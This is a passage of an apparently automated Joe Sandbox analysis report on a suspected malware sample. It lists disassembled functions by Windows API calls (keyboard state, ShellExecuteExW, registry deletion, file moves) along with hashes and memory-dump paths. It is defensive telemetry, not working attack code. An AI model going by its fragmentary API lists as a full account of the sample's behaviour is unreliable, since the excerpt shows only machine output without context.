                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                                                  • Instruction ID: 456522e57599aadf6aee3bfecc7f8c9937915b31f1cc567a268e8b4c5655bd40
                                                  • Opcode Fuzzy Hash: ef0d3efbdb96aa155d6898e7498e8433aa18235857ecd7374851025a9f50410e
                                                  • Instruction Fuzzy Hash: A011EB3160C3C67AE7015A56DC46D6BB39CFF1B375F10002AFA44D7181D6659F4049A6
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 008E454E
                                                  • LoadStringW.USER32(00000000), ref: 008E4555
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 008E456B
                                                  • LoadStringW.USER32(00000000), ref: 008E4572
                                                  • _wprintf.LIBCMT ref: 008E4598
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008E45B6
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 008E4593
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                                                  • Instruction ID: f8317b5a5dbc6ada890f1f2c1133576defc400ac50be8ebc3ef4da23d2959546
                                                  • Opcode Fuzzy Hash: 0eedb7a6efe10e21f75454f0c2458e56283114994af92aab0091103df7da31c0
                                                  • Instruction Fuzzy Hash: 8C014FF290420CBFE760EBA49D89EE7776CE708301F0005A5BB49D2451EA759F859B71
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?), ref: 00882ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00882B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006), ref: 008BC46A
                                                  • ShowWindow.USER32(FFFFFFFF,?), ref: 008BC4D6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: 59e2f2be689b6c127b6f28c3105d6784d270edbd6febd781a9fdd6b433848b32
                                                  • Instruction ID: 09d939f7b7c486880674222e363c9df78e23778219046dcabf74f1e949edbd08
                                                  • Opcode Fuzzy Hash: 59e2f2be689b6c127b6f28c3105d6784d270edbd6febd781a9fdd6b433848b32
                                                  • Instruction Fuzzy Hash: B9414774218694AEC73DAB2CCC9CBBF7B92FF86314F18881DE057C6660C635A941D711
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 008E737F
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 008E73B6
                                                  • RtlEnterCriticalSection.NTDLL(?), ref: 008E73D2
                                                  • _memmove.LIBCMT ref: 008E7420
                                                  • _memmove.LIBCMT ref: 008E743D
                                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 008E744C
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008E7461
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 008E7480
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 5113eae84917cc9d2b305c9ce559ba484b00603f775db5ca06555400420a6398
                                                  • Instruction ID: 9b33ca9e90b86da2dca5429b30fd32dcaab73e18acaa633d3e1fa26bdc3bd638
                                                  • Opcode Fuzzy Hash: 5113eae84917cc9d2b305c9ce559ba484b00603f775db5ca06555400420a6398
                                                  • Instruction Fuzzy Hash: A9319E35908205EFDF10EF69DC85AAE7BB8FF45710F1440A5F904EB286DB709A10DBA1
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 0090645A
                                                  • GetDC.USER32(00000000), ref: 00906462
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0090646D
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00906479
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 009064B5
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 009064C6
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00906500
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00906520
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                                                  • Instruction ID: 6e659f3285ebf0d82216aa053d38e5e15433843f4a85c91547ff7eedc4a7084e
                                                  • Opcode Fuzzy Hash: 15ea53a85a3be54a4a7b44a7b8d61d5a435a04d21e44c8c3008c64f66430e6bc
                                                  • Instruction Fuzzy Hash: 6A318D72214214BFEF208F10CC4AFEA3FADEF0A765F044065FE089A191C7759951CB60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                                                  • Instruction ID: 9929096bfbd8d22e19f4b3fbeca64e77befc67e5255d4ca2028cede652ffd511
                                                  • Opcode Fuzzy Hash: e6f5592e65a6500b1fbf310a70ec024746f8f8c28d9d2f65e428a0db94a2c62d
                                                  • Instruction Fuzzy Hash: 6721077174061BB7EA10B6249D46FAB339CFF61398F080122FE05D6782EB11DD21C2E6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                                                  • Instruction ID: 16bf42286dad2bdf9c0d66e4b240cbd7d44965dfb6168a2601e0519f009de0e8
                                                  • Opcode Fuzzy Hash: 8efd0b2531ac7e32160b8d979c5f3fcf41fb807617801d7a7fdd69bafbdb4c11
                                                  • Instruction Fuzzy Hash: 69717A30904109EFCF14EF98CC89ABEBB79FF85314F148159F915EA251DB34AA52CBA4
                                                  APIs
                                                  • IsWindow.USER32(00AD23F8), ref: 0090B6A5
                                                  • IsWindowEnabled.USER32(00AD23F8), ref: 0090B6B1
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0090B795
                                                  • SendMessageW.USER32(00AD23F8,000000B0,?,?), ref: 0090B7CC
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0090B809
                                                  • GetWindowLongW.USER32(00AD23F8,000000EC), ref: 0090B82B
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0090B843
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 6e8b806e937bb6cfea4b94db9dac9ecf70aa3f680dd1a76b45b98e59305fd566
                                                  • Instruction ID: c0877fd123610631f38fa2c5aec147bf9ae9aff9ea9796bff97f9c89c3c6d43d
                                                  • Opcode Fuzzy Hash: 6e8b806e937bb6cfea4b94db9dac9ecf70aa3f680dd1a76b45b98e59305fd566
                                                  • Instruction Fuzzy Hash: CE719A75604304AFDB209F64C8A4FAABBFDFF8A310F144469E946973E1C732A981DB51
                                                  APIs
                                                  • _memset.LIBCMT ref: 008FF75C
                                                  • _memset.LIBCMT ref: 008FF825
                                                  • ShellExecuteExW.SHELL32(?), ref: 008FF86A
                                                    • Part of subcall function 00889997: __itow.LIBCMT ref: 008899C2
                                                    • Part of subcall function 00889997: __swprintf.LIBCMT ref: 00889A0C
                                                    • Part of subcall function 0089FEC6: _wcscpy.LIBCMT ref: 0089FEE9
                                                  • GetProcessId.KERNEL32(00000000), ref: 008FF8E1
                                                  • CloseHandle.KERNEL32(00000000), ref: 008FF910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: 1ad014635a49c9d957b16914cdc7e785cfebfff0b0c9dfb23b2eb779f9910a5e
                                                  • Instruction ID: 2f41508400bfdd31c317bb17234e144bbe49acbf62fcacc51171e7a22db83769
                                                  • Opcode Fuzzy Hash: 1ad014635a49c9d957b16914cdc7e785cfebfff0b0c9dfb23b2eb779f9910a5e
                                                  • Instruction Fuzzy Hash: FE618D75A00619DFCF14EF68C9849AEBBF5FF48310B148469E956EB352CB30AD41CB91
                                                  APIs
                                                  • GetParent.USER32(?), ref: 008E149C
                                                  • GetKeyboardState.USER32(?), ref: 008E14B1
                                                  • SetKeyboardState.USER32(?), ref: 008E1512
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 008E1540
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 008E155F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 008E15A5
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 008E15C8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                                  • Instruction ID: cfed01f45b64007e617a8503e344aa8ae53ab6b57aa6770c412ef0fc7318cf0b
                                                  • Opcode Fuzzy Hash: f8179aff22a19a73c4d77206caba15ab5ae20d02e906c8b02b2bfdfae85912cf
                                                  • Instruction Fuzzy Hash: F451E2B06087D53EFF32422A8C49BBABEAABB47304F084489E1D6C58D2C7A4DC84D751
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 008E12B5
                                                  • GetKeyboardState.USER32(?), ref: 008E12CA
                                                  • SetKeyboardState.USER32(?), ref: 008E132B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 008E1357
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 008E1374
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 008E13B8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 008E13D9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                                                  • Instruction ID: 28b320c564a4ed642ae5dda84621dd1ef513401b6c04f2f6a7e13b7fe46de27f
                                                  • Opcode Fuzzy Hash: 7c15f587591ba55324bf351d6740790dd74c909807f94138e8d50ea909227f6f
                                                  • Instruction Fuzzy Hash: 1051E4B05086D53DFF3282268C59BBA7EA9FB07304F084589E1D4C6DC2D7A9EC84D751
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                                                  • Instruction ID: 5c8281eb5dff063bd809272249b42fa031c4057b01f818ea7eb533ee5628f9cb
                                                  • Opcode Fuzzy Hash: d575a9911f39b6eeec5fe63e3b797376eb9fbf131fcb7fd11a57a586b858b943
                                                  • Instruction Fuzzy Hash: 1F41B4A5C2012876DB10FBB988869CF77A8FF06710F509462F918E3522F634D755C7A6
                                                  APIs
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008E38D3,?), ref: 008E48C7
                                                    • Part of subcall function 008E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008E38D3,?), ref: 008E48E0
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 008E38F3
                                                  • _wcscmp.LIBCMT ref: 008E390F
                                                  • MoveFileW.KERNEL32(?,?), ref: 008E3927
                                                  • _wcscat.LIBCMT ref: 008E396F
                                                  • SHFileOperationW.SHELL32(?), ref: 008E39DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                   • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
                                                   • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 125afe9d7102161af882c8cc488020eebc1d334f1b0dbfe8ca360b2b52b39dfb
                                                  • Instruction ID: 5208bdda6515b1dc5811123a4be52c2447de8cfb0c081590a13859fed7791d55
                                                  • Opcode Fuzzy Hash: 125afe9d7102161af882c8cc488020eebc1d334f1b0dbfe8ca360b2b52b39dfb
                                                  • Instruction Fuzzy Hash: 05416DB24083849EC761EF69C4859DBB7E8FF8A340F10192EB499C3152EB75D688C752
                                                  APIs
                                                  • _memset.LIBCMT ref: 00907519
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 009075C0
                                                  • IsMenu.USER32(?), ref: 009075D8
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00907620
                                                  • DrawMenuBar.USER32 ref: 00907633
Memory Dump Source
• Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                  • String ID: 0
                                                  • API String ID: 3866635326-4108050209
                                                  • Opcode ID: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                                                  • Instruction ID: 9875ea033959298d9b67beb23a953e0030f25bee339c8ae95f1a717de6d20763
                                                  • Opcode Fuzzy Hash: 9c795faf01cc081a67f2cd83e553c50bcfb41660cdfdb600bd68354777c83e55
                                                  • Instruction Fuzzy Hash: 27414A75A04608EFDB20DF94D884EAABBF8FF05324F048029F91697290D731AD50DFA1
                                                  APIs
                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0090125C
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00901286
                                                  • FreeLibrary.KERNEL32(00000000), ref: 0090133D
                                                    • Part of subcall function 0090122D: RegCloseKey.ADVAPI32(?), ref: 009012A3
                                                    • Part of subcall function 0090122D: FreeLibrary.KERNEL32(?), ref: 009012F5
                                                    • Part of subcall function 0090122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00901318
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 009012E0
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmp
